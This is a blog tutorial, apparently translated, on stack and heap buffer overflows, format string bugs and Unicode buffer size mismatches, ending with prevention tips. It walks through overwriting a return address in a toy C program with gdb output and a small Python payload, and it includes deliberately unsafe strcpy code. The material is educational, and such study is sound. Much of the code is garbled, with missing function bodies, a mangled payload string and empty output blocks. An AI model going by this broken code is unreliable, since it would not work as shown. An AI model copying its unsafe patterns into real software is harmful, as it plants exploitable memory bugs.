Buffer overflow attack

On the previous post, I introduced to you the concept of buffer overflow. On this post, I am going to guide you how to find and exploit buffer overflow vulnerability.

Stack overflows are usually the easiest to use for all buffer overflows. Before understanding the stack overflow, first understand the following concepts:

  1. Buffers
    In short, it is a contiguous area of computer memory that can hold multiple instances of the same data type.
  2. Stack
    A stack is an abstract data type that is often used in computer science. The object in the stack has a feature: the last object placed on the stack is always taken first, and this feature is usually called a last-in, first-out (LIFO) queue. The stack defines some operations. The two most important are PUSH and POP. The PUSH operation adds an element to the top of the stack. POP operation Instead, remove one element at the top of the stack and decrement the stack by one.
  3. Register ESP, EBP, EIP
    1. The ESP register of the CPU holds the top pointer of the current thread,
    2. The EBP register holds the bottom pointer of the current thread.
    3. The EIP register of the CPU stores the memory address stored in the next CPU instruction. When the CPU executes the current instruction, it reads the memory address of the next instruction from the EIP register and then continues execution.

Modern computers are designed to understand the high-level language of people’s minds. In the use of high-level language constructor of the most important techniques are the process (procedure) and function (function). From this point of view, a procedure call can change the control flow of a program like a jump command, but unlike a jump, the function returns control to the statement or instruction after the call when the job completes. This high-level abstraction is achieved by the help of the stack. The stack is also used to dynamically allocate space to the local variables used in the function, as well as passing parameters and function return values to the function.

The stack consists of logical stack frames. When a function is called, the logical stack frame is pushed onto the stack and the logical stack frame is popped off the stack when the function returns. The stack frame contains the parameters of the function, the local variables of the function, and the data required to restore the previous stack frame, including the value of the instruction pointer (IP) at the time of the function call.

The first thing that must be done when a routine is called is to save the previous FP (so that it can be restored when the routine exits). Then it copies the SP to the FP, creates a new FP, and moves the SP forward for the local variable reservation. This is called the prolog work of the routine. When the routine exits, the stack must be clean, this is called the end of the routine (epilog) work. Intel’s ENTER and LEAVE instructions, Motorola’s LINK and UNLINK instructions, can be used for the effective prologue and finishing.

Below we use a simple example to show the appearance of the stack: example.c:

void function(int a, int b, int c) {

char buffer1[5];
char buffer2[10];
void main() {


To understand what the program does when calling a function(), we compile with the -S option of gcc to produce assembly code output:

$ gcc -S -o example.s example1.c


By looking at the assembly language output, we see that the call to a function() is translated to:

pushl $3

pushl $2
pushl $1
call function


We call the three parameters of the function into the stack from backward to forward, and then call function (). The instruction call will also push the instruction pointer (IP) on the stack. We call this saved IP as the return address (RET). The first thing done in the function is the prologue of the routine:

pushl %ebp

movl %esp,%ebp
subl $20,%esp


The frame pointer EBP is pushed onto the stack, and the current SP is copied to EBP, making it a new frame pointer. We call this saved FP the SFP. Next we reduce the value of SP to reserve space for local variables We must remember that memory can only be addressed in words, where a word is 4 bytes, 32 bits, so a buffer of 5 bytes takes up 8 bytes (2 words) of memory, And 10 bytes of the buffer will take 12 bytes (3 words) of memory space.This is why the SP to lose 20 reasons so that we can imagine function () is called when the stack looks like:

So, from the above chart, if we input buffer1 long, and directly overwrite the back of the sfp and ret, you can modify the function of the return address. Let’s look at an example.


On how to prepare Shell Code, how to prepare in advance a dangerous memory in the implementation of the code and how to accurately calculate the implementation of the buffer overflow that period of dangerous code while the return address back to the original return address … … This involves too much of the underlying Compilation of knowledge, brother Fucai also just fly, can not become a real hacker master. However, the level of the level of hacker friends seems to improve our code security is very necessary!

So, in this example, we assume that the so-called dangerous code is already in the source code, the function bar. Function foo is a normal function, the main function is called, the implementation of a very unsafe strcpy work. Using unsafe strcpy, we can pass a buffer over the length of the buf string, the implementation of the copy, the buffer overflow, the ret return address into the address of the function bar, to call the purpose of the function bar.

#include <stdio.h>

#include <string.h>
void foo(const char* input)
char buf[10];
printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
strcpy(buf, input);
printf("buf = %s\n", buf);
printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
void bar(void)
printf("Augh! I've been hacked!\n");
int main(int argc, char* argv[])
printf("Address of foo = %p\n", foo);
printf("Address of bar = %p\n", bar);
if (argc != 2)
printf("Please supply a string as an argument!\n");
return -1;
return 0;


Compile the above program with GCC, and turn off the Buffer Overflow Protect switch:

gcc -g -fno-stack-protector test.c -o test


In order to find out the return address, I use gdb to debug the above-compiled program.

(gdb) r

Starting program: /media/Personal/MyProject/C/StackOver/test abc
Address of foo = 0x80483d4
Address of bar = 0x8048419

Breakpoint 1, main (argc=2, argv=0xbfe5ab24) at test.c:24
24 foo(argv[1]);

(gdb) info registers ebp
ebp 0xbfe5aa88 0xbfe5aa88
(gdb) n

Breakpoint 2, foo (input=0xbfe5c652 "abc") at test.c:4
4 {
(gdb) n
6 printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

(gdb) info registers ebp
ebp 0xbfe5aa68 0xbfe5aa68

(gdb) x/ 0xbfe5aa68
0xbfe5aa68: 0xbfe5aa88
(gdb) n
My stack looks like:
7 strcpy(buf, input);

(gdb) x/i 0x8048499
0x8048499 <main+108>: movl $0x8048653,(%esp)
(gdb) disassemble main
Dump of assembler code for function main:
0x0804842d <main+0>: lea 0x4(%esp),%ecx
0x08048431 <main+4>: and $0xfffffff0,%esp
0x08048434 <main+7>: pushl -0x4(%ecx)
0x08048437 <main+10>: push %ebp

0x08048494 <main+103>: call 0x80483d4 <foo>
0x08048499 <main+108>: movl $0x8048653,(%esp)
0x080484a0 <main+115>: call 0x8048340 <puts@plt>


Therefore, as long as we enter a long string, covering 0x08048499, become bar function address 0x8048419, to achieve the purpose of calling the bar function.To enter something like 0x8048419 into the application, we need to use a Perl or Python script, such as the following Python script:

import os
arg = ‘ABCDEFGHIJKLMN’ + ‘”x19″x84″x04″x08’
cmd = ‘./test ‘ + arg

Note that the above 08 04 84 19 to two anti-written. Do the following:

$python hack.py

Address of foo = 0x80483d4

Address of bar = 0x8048419

My stack looks like:










Now the stack looks like:








Heap Overflows

A heap is an area of memory that is used by the application and is dynamically allocated at runtime. Heap memory is different from stack memory in that it is more persistent between functions. This means that the memory allocated to a function will remain allocated until it is completely freed. This indicates that a heap overflow may have occurred but has not been noticed until the memory segment is used later. Here is a simple look at the following to see one of the most simple examples of heap overflow:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int main(int argc, char *argv[])


char *input = malloc(20);

char *output = malloc(20);

strcpy(output, “normal output”);

strcpy(input, argv[1]);

printf(“input at %p: %s\n”, input, input);

printf(“output at %p: %s\n”, output, output);

printf(“\n\n%s\n”, output);


We look at the implementation of the results:

[root@localhost]# ./heap1 hackshacksuselessdata
input at 0x8049728: hackshacksuselessdata
output at 0x8049740: normal output

normal output
[root@localhost]# ./heap1 hacks1hacks2hacks3hacks4hacks5hacks6hacks7hackshackshackshackshackshackshacks
input at 0x8049728: hacks1hacks2hacks3hacks4hacks5hacks6hacks7hackshackshackshackshackshackshacks
output at 0x8049740: hackshackshackshacks5hacks6hacks7

[root@localhost]# ./heap1 “hackshacks1hackshacks2hackshacks3hackshacks4what have I done?”
input at 0x8049728: hackshacks1hackshacks2hackshacks3hackshacks4what have I done?
output at 0x8049740: what have I done?

Formatted string error

This error is the use of printf, sprintf, fprint and other functions, the format is not used string, for example the correct usage is:

printf(“%s”, input)

If written directly:



There will be loopholes, when the input of some illegally manufactured characters, the memory will be rewritten, the implementation of some illegal instructions.

Unicode and ANSI buffer sizes do not match

We often encounter the need to convert between Unicode and ANSI, the vast majority of Unicode functions in accordance with the wide character format (double byte) size, rather than in accordance with the byte size to calculate the size of the buffer, so when the conversion is not careful It may cause overflow. For example, the most commonly attacked function is MultiByteToWideChar, see the following code:

BOOL GetName(char *szName)


WCHAR wszUserName[256];

// Convert ANSI name to Unicode.

MultiByteToWideChar(CP_ACP, 0,






WszUserName is wide, so sizeof (wszUserName) will be 256 * 2 bytes, so there is a potential buffer overflow problem. The correct wording should be this:

MultiByteToWideChar(CP_ACP, 0,




sizeof(wszUserName) / sizeof(wszUserName[0]));

The Internet Print Protocol Buffer Overflow has been the real cause of such problems.

Prevention and detection

  • Unsafe function
    Avoid the use of unsafe string handling functions, such as the use of safe functions instead:

    Insecure function Safety function
    strcpy strncpy
    strcat strncat
    sprint _snprintf
    gets fgets
  • Visual C ++ .NET / GS Options
    /GS option can prevent the destruction of the stack to ensure the integrity of the stack, but can not completely prevent the buffer overflow problem, for example, for heap overflow, / GS is powerless.
  • Source code scanning
    The simplest source code scan:

    grep strcpy *.c